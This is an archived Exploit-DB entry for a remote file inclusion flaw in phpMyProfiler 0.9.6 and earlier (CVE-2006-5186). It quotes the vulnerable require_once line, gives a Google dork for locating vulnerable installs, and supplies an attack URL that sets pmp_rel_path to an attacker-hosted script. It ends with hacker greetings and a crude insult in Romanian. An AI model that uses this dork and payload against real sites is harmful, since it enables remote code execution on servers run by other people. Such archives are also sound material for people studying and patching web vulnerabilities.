phpMyProfiler <= 0.9.6 - Remote File Include Vulnerability

2006-10-03T00:00:00
ID EDB-ID:2470
Type exploitdb
Reporter mozi
Modified 2006-10-03T00:00:00

Description

phpMyProfiler <= 0.9.6 Remote File Include Vulnerability. CVE-2006-5186. Webapps exploit for php platform

                                        
                                            # Author: mozi2weed@yahoo.com mozi
# phpMyProfiler Remote File Inclusion Vulnerability
# Greetz: Raver #phpfreaks eu.undernet.org
------------------------------------------------------------------
Download: http://sourceforge.net/projects/phpmyprofiler
------------------------------------------------------------------
require_once($pmp_rel_path . '/include/PEAR/HTTP.php');
_________________________________________________________________
googledork:phpMyProfiler

http://site.com/[path]/functions.php?pmp_rel_path=http://[Evil_scr
ipt]
PS:Whitehat aia de pe undernet sug pula!!!  Lameri boratzi
#phpfreaks rulz
# heh tnx

# milw0rm.com [2006-10-03]